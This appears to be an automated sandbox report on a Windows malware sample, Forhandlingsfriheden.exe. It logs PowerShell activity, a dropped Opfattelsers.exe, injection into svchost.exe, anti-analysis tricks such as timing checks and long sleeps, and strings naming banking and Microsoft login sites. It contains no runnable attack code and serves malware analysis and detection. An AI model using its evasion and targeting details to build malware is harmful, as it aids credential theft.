Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	API/Special instruction interceptor: Address: 3110DFB
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe

Code function: 6_2_1F7DFE20 rdtsc

6_2_1F7DFE20

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6179			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3484			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	API coverage: 0.2 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7108

Thread sleep time: -6456360425798339s >= -30000s

Source: C:\Windows\SysWOW64\svchost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Code function: 0_2_0040689E FindFirstFileW,FindClose,	0_2_0040689E
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Code function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C4D
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Code function: 0_2_00402930 FindFirstFileW,	0_2_00402930
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_029CC660 FindFirstFileW,FindNextFileW,FindClose,	9_2_029CC660

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: 72945936.9.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 72945936.9.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: 72945936.9.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: 72945936.9.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: 72945936.9.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 72945936.9.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Opfattelsers.exe, 00000006.00000002.3039878471.0000000003B41000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2935042588.0000000003B41000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2935165232.0000000003B41000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 72945936.9.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 72945936.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 72945936.9.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 72945936.9.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: 72945936.9.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: 72945936.9.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: PxuyeSuijNdsM.exe, 00000008.00000002.3360607525.0000000001430000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3359998608.000000000300C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 72945936.9.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: Tvrvejen179.Maa.0.dr	Binary or memory string: ovmCI
Source: 72945936.9.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 72945936.9.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 72945936.9.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 72945936.9.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: powershell.exe, 00000002.00000002.2795610607.0000000004EBF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\
Source: 72945936.9.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 72945936.9.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.2795610607.0000000004EBF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\
Source: 72945936.9.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 72945936.9.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 72945936.9.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 72945936.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: powershell.exe, 00000002.00000002.2795610607.0000000004EBF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\
Source: 72945936.9.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 72945936.9.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 72945936.9.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 72945936.9.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 72945936.9.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 72945936.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 72945936.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 72945936.9.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: Opfattelsers.exe, 00000006.00000002.3039764364.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8~
Source: firefox.exe, 0000000B.00000002.3331314850.0000025672DBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllFF

Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	API call chain: ExitProcess graph end node			graph_0-3714
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	API call chain: ExitProcess graph end node			graph_0-3722

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\svchost.exe

Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe

Code function: 6_2_1F7DFE20 rdtsc

6_2_1F7DFE20

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_06FE42F0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,

2_2_06FE42F0

Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F843F90 mov eax, dword ptr fs:[00000030h]	6_2_1F843F90
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F843F90 mov eax, dword ptr fs:[00000030h]	6_2_1F843F90
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CBF60 mov eax, dword ptr fs:[00000030h]	6_2_1F7CBF60
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A1F50 mov eax, dword ptr fs:[00000030h]	6_2_1F7A1F50
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D7F51 mov eax, dword ptr fs:[00000030h]	6_2_1F7D7F51
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85BFC0 mov ecx, dword ptr fs:[00000030h]	6_2_1F85BFC0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85BFC0 mov eax, dword ptr fs:[00000030h]	6_2_1F85BFC0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F873FC0 mov eax, dword ptr fs:[00000030h]	6_2_1F873FC0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F823FD7 mov eax, dword ptr fs:[00000030h]	6_2_1F823FD7
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DBFEC mov eax, dword ptr fs:[00000030h]	6_2_1F7DBFEC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DBFEC mov eax, dword ptr fs:[00000030h]	6_2_1F7DBFEC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DBFEC mov eax, dword ptr fs:[00000030h]	6_2_1F7DBFEC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F821F13 mov eax, dword ptr fs:[00000030h]	6_2_1F821F13
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82DF10 mov eax, dword ptr fs:[00000030h]	6_2_1F82DF10
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79BFD0 mov eax, dword ptr fs:[00000030h]	6_2_1F79BFD0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85DF2F mov eax, dword ptr fs:[00000030h]	6_2_1F85DF2F
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D1FCD mov eax, dword ptr fs:[00000030h]	6_2_1F7D1FCD
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D1FCD mov eax, dword ptr fs:[00000030h]	6_2_1F7D1FCD
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D1FCD mov eax, dword ptr fs:[00000030h]	6_2_1F7D1FCD
